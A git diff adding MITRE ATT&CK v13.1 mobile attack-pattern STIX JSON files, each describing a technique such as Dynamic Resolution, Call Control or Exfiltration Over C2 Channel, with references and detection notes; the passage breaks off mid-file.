a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2ccc3d39-9598-4d32-9657-42e1c7095d26.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2ccc3d39-9598-4d32-9657-42e1c7095d26.json new file mode 100644 index 0000000000000000000000000000000000000000..9dbc57debaf77042cedd5c2d18a4ae08372e31dd --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2ccc3d39-9598-4d32-9657-42e1c7095d26.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--072baa3c-d82d-4553-b4ce-288cca6f31c7", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2ccc3d39-9598-4d32-9657-42e1c7095d26", + "created": "2022-04-05T19:57:15.734Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1637", + "url": "https://attack.mitre.org/techniques/T1637" + }, + { + "source_name": "Data Driven Security DGA", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. This algorithm can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.", + "modified": "2022-04-05T19:57:15.734Z", + "name": "Dynamic Resolution", + "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different Domain Generation Algorithms (DGAs), constantly evolving malware families, and the increasing complexity of the algorithms. There are a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) Content delivery network (CDN) domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, a more general approach for detecting a suspicious domain is to check for recently registered names or rarely visited domains.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2d646840-f6f5-4619-a5a8-29c8316bbac5.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2d646840-f6f5-4619-a5a8-29c8316bbac5.json new file mode 100644 index 0000000000000000000000000000000000000000..4dd8961f77fc1cc8cc811cca09fa8c5f2ef9a514 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2d646840-f6f5-4619-a5a8-29c8316bbac5.json @@ -0,0 +1,74 @@ +{ + "type": "bundle", + "id": "bundle--0f177646-b457-40d7-8319-45a4e3260711", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2d646840-f6f5-4619-a5a8-29c8316bbac5", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1477", + "url": "https://attack.mitre.org/techniques/T1477" + }, + { + "source_name": "Forbes-iPhoneSMS", + "url": "http://www.forbes.com/2009/07/28/hackers-iphone-apple-technology-security-hackers.html", + "description": "Andy Greenberg. (2009, July 28). How to Hijack 'Every iPhone In The World'. Retrieved December 23, 2016." + }, + { + "source_name": "Register-BaseStation", + "url": "http://www.theregister.co.uk/2015/11/12/mobile_pwn2own1/", + "description": "D. Pauli. (2015, November 12). Samsung S6 calls open to man-in-the-middle base station snooping. Retrieved December 23, 2016." + }, + { + "source_name": "ProjectZero-BroadcomWiFi", + "url": "https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html", + "description": "Gal Beniamini. (2017, April 4). Over The Air: Exploiting Broadcom's Wi-Fi Stack. Retrieved November 8, 2018." + }, + { + "source_name": "Weinmann-Baseband", + "url": "https://www.usenix.org/system/files/conference/woot12/woot12-final24.pdf", + "description": "R. Weinmann. (2012, August 6-7). Baseband Attacks: Remote Exploitation of Memory Corruptions in Cellular Protocol Stacks. Retrieved December 23, 2016." + }, + { + "source_name": "SRLabs-SIMCard", + "url": "https://srlabs.de/bites/rooting-sim-cards/", + "description": "SRLabs. (n.d.). SIM cards are prone to remote hacking. Retrieved December 23, 2016." + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces.\n\n### Baseband Vulnerability Exploitation\n\nA message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi(Citation: ProjectZero-BroadcomWiFi) or other) to the mobile device could exploit a vulnerability in code running on the device(Citation: Register-BaseStation)(Citation: Weinmann-Baseband).\n\n### Malicious SMS Message\n\nAn SMS message could contain content designed to exploit vulnerabilities in the SMS parser on the receiving device(Citation: Forbes-iPhoneSMS). An SMS message could also contain a link to a web site containing malicious content designed to exploit the device web browser. Vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages(Citation: SRLabs-SIMCard).", + "modified": "2022-04-06T15:42:13.444Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit via Radio Interfaces", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2de38279-043e-47e8-aaad-1b07af6d0790.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2de38279-043e-47e8-aaad-1b07af6d0790.json new file mode 100644 index 0000000000000000000000000000000000000000..9feb53fabbace680367921eb8209928262d2832e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2de38279-043e-47e8-aaad-1b07af6d0790.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--d64dd489-ad2a-4e58-9b1b-70557f581651", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2de38279-043e-47e8-aaad-1b07af6d0790", + "created": "2017-10-25T14:48:26.890Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1423", + "url": "https://attack.mitre.org/techniques/T1423" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans from the mobile device. This technique may take advantage of the mobile device's access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).", + "modified": "2022-04-11T19:12:38.451Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network Service Scanning", + "x_mitre_detection": "Network service scanning can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "discovery", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2f0e8d80-4b8b-4f4a-b5cc-132afe7e057d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2f0e8d80-4b8b-4f4a-b5cc-132afe7e057d.json new file mode 100644 index 0000000000000000000000000000000000000000..8f3c9c3191b9f457874b5deb4357f951894f2557 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2f0e8d80-4b8b-4f4a-b5cc-132afe7e057d.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--bb39b3e3-09e3-4a90-a096-b2397cf8e76d", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2f0e8d80-4b8b-4f4a-b5cc-132afe7e057d", + "created": "2021-09-30T18:18:52.285Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1618", + "url": "https://attack.mitre.org/techniques/T1618" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary\u2019s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device. \n\nWhile there are many ways this can be accomplished, one method is by using the device\u2019s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.", + "modified": "2022-04-11T20:06:56.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "User Evasion", + "x_mitre_detection": "Mobile security products may be able to detect some forms of user evasion. Otherwise, the act of hiding malicious activity could be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc.json new file mode 100644 index 0000000000000000000000000000000000000000..d55ef008ad09a5648149802fc61ae2ddcbb90b8f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--6b1b8127-400d-45f9-85f4-946706fab667", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "created": "2022-04-01T15:43:45.913Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1646", + "url": "https://attack.mitre.org/techniques/T1646" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-29" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", + "modified": "2022-04-08T16:25:44.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exfiltration Over C2 Channel", + "x_mitre_detection": "Exfiltration over C2 channel can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "exfiltration", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172.json new file mode 100644 index 0000000000000000000000000000000000000000..ed00b99ef36e84c63223b18bdd649efb8ccb11c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--747e06fb-5a1d-4c83-9a58-883cef87ee6b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:49:53.301Z", + "name": "Exploitation for Privilege Escalation", + "description": "Adversaries may exploit software vulnerabilities in order to to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in an application, service, within the operating system software, or kernel itself to execute adversary-controlled code. Security constructions, such as permission levels, will often hinder access to information and use of certain techniques. Adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. \n\nWhen initially gaining access to a device, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and applications running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user- level permission to root permissions depending on the component that is vulnerable. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can potentially utilize device APIs to determine if a device has been rooted or jailbroken. Application vetting services could potentially determine if an application contains code designed to exploit vulnerabilities.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "created": "2017-10-25T14:48:29.405Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1404", + "external_id": "T1404" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html", + "external_id": "APP-26" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69.json new file mode 100644 index 0000000000000000000000000000000000000000..ebfc3ff701925c4914d859ab2201a7146901eedc --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69.json @@ -0,0 +1,84 @@ +{ + "type": "bundle", + "id": "bundle--13bb4ad6-7ab7-4e72-8093-1671dd1697ae", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-16T18:31:37.189Z", + "name": "Call Control", + "description": "Adversaries may make, forward, or block phone calls without user authorization. This could be used for adversary goals such as audio surveillance, blocking or forwarding calls from the device owner, or C2 communication.\n\nSeveral permissions may be used to programmatically control phone calls, including:\n\n* `ANSWER_PHONE_CALLS` - Allows the application to answer incoming phone calls(Citation: Android Permissions)\n* `CALL_PHONE` - Allows the application to initiate a phone call without going through the Dialer interface(Citation: Android Permissions)\n* `PROCESS_OUTGOING_CALLS` - Allows the application to see the number being dialed during an outgoing call with the option to redirect the call to a different number or abort the call altogether(Citation: Android Permissions)\n* `MANAGE_OWN_CALLS` - Allows a calling application which manages its own calls through the self-managed `ConnectionService` APIs(Citation: Android Permissions)\n* `BIND_TELECOM_CONNECTION_SERVICE` - Required permission when using a `ConnectionService`(Citation: Android Permissions)\n* `WRITE_CALL_LOG` - Allows an application to write to the device call log, potentially to hide malicious phone calls(Citation: Android Permissions)\n\nWhen granted some of these permissions, an application can make a phone call without opening the dialer first. However, if an application desires to simply redirect the user to the dialer with a phone number filled in, it can launch an Intent using `Intent.ACTION_DIAL`, which requires no specific permissions. This then requires the user to explicitly initiate the call or use some form of [Input Injection](https://attack.mitre.org/techniques/T1516) to programmatically initiate it.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_contributors": [ + "Gaetan van Diemen, ThreatFabric" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view their default phone app in device settings. Users can review available call logs for irregularities, such as missing or unrecognized calls.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "created": "2021-09-20T13:42:20.824Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1616", + "external_id": "T1616" + }, + { + "source_name": "Android Permissions", + "description": "Google. (2021, August 11). Manifest.permission. Retrieved September 22, 2021.", + "url": "https://developer.android.com/reference/android/Manifest.permission" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-41.html", + "external_id": "APP-41" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-42.html", + "external_id": "CEL-42" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-36.html", + "external_id": "CEL-36" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-18.html", + "external_id": "CEL-18" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--37047267-3e56-453c-833e-d92b68118120.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--37047267-3e56-453c-833e-d92b68118120.json new file mode 100644 index 0000000000000000000000000000000000000000..638e0ee02b7776dbf1de63cdf6c76d8903cb1b0d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--37047267-3e56-453c-833e-d92b68118120.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--c3772b48-78cf-455b-98b8-7e32b8a36d47", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--37047267-3e56-453c-833e-d92b68118120", + "created": "2022-04-06T13:22:57.683Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1639.001", + "url": "https://attack.mitre.org/techniques/T1639/001" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-30" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). Adversaries may employ custom or publicly available encoding/compression algorithms (such as base64) or embed data within protocol headers and fields.", + "modified": "2022-04-06T13:23:10.087Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exfiltration Over Unencrypted Non-C2 Protocol", + "x_mitre_detection": "Exfiltration Over Alternative Protocols can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "exfiltration", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9.json new file mode 100644 index 0000000000000000000000000000000000000000..bfcb0521b77d238df450169e28b2985feaaff7b7 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--30e2a6c9-a3c5-429c-aaa8-edc6e64af1ff", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-16T18:27:42.752Z", + "name": "Broadcast Receivers", + "description": "Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities. \n\nAn intent is a message passed between Android applications or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received. \n\nIn addition to Android system intents, malicious applications can register for intents broadcasted by other applications. This allows the malware to respond based on actions in other applications. This behavior typically indicates a more intimate knowledge, or potentially the targeting of specific devices, users, or applications. \n\nIn Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit intents that applications can register for in the manifest. In most cases, applications that register through the manifest will no longer receive the broadcasts. Now, applications must register context-specific broadcast receivers while the user is actively using the app.(Citation: Android Changes to System Broadcasts) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_contributors": [ + "Alex Hinchliffe, Palo Alto Networks" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services can detect which broadcast intents an application registers for and which permissions it requests. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "created": "2022-03-30T14:41:00.672Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1624/001", + "external_id": "T1624.001" + }, + { + "source_name": "Android Changes to System Broadcasts", + "description": "Google. (2019, December 27). Broadcasts Overview. Retrieved January 27, 2020.", + "url": "https://developer.android.com/guide/components/broadcasts#changes-system-broadcasts" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3911658a-6506-4deb-9ab4-595a51ae71ad.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3911658a-6506-4deb-9ab4-595a51ae71ad.json new file mode 100644 index 0000000000000000000000000000000000000000..7657c2376c5634c7fb827d9d3a563ed721b3b208 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3911658a-6506-4deb-9ab4-595a51ae71ad.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--72b54946-3c9d-479e-8d3d-56dac8ab37dd", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--3911658a-6506-4deb-9ab4-595a51ae71ad", + "created": "2017-10-25T14:48:16.650Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1436", + "url": "https://attack.mitre.org/techniques/T1436" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. \n\nThey may use commonly open ports such as\n\n* TCP:80 (HTTP)\n* TCP:443 (HTTPS)\n* TCP:25 (SMTP)\n* TCP/UDP:53 (DNS)\n\nThey may use the protocol associated with the port or a completely different protocol.", + "modified": "2022-04-06T15:40:47.556Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Commonly Used Port", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--393e8c12-a416-4575-ba90-19cc85656796.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--393e8c12-a416-4575-ba90-19cc85656796.json new file mode 100644 index 0000000000000000000000000000000000000000..f95a21bb3df0e455a702630596676190ef926e9a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--393e8c12-a416-4575-ba90-19cc85656796.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--03b172d0-b763-4fd9-928a-b9e77b2faf0c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--393e8c12-a416-4575-ba90-19cc85656796", + "created": "2017-10-25T14:48:26.104Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1439", + "url": "https://attack.mitre.org/techniques/T1439" + }, + { + "source_name": "mHealth", + "url": "https://experts.illinois.edu/en/publications/security-concerns-in-android-mhealth-apps", + "description": "D. He et al.. (2014). Security Concerns in Android mHealth Apps. Retrieved December 24, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-0" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-1" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "If network traffic between the mobile device and remote servers is unencrypted or is encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop on communication.(Citation: mHealth)", + "modified": "2022-04-05T20:17:46.147Z", + "created_by_ref": 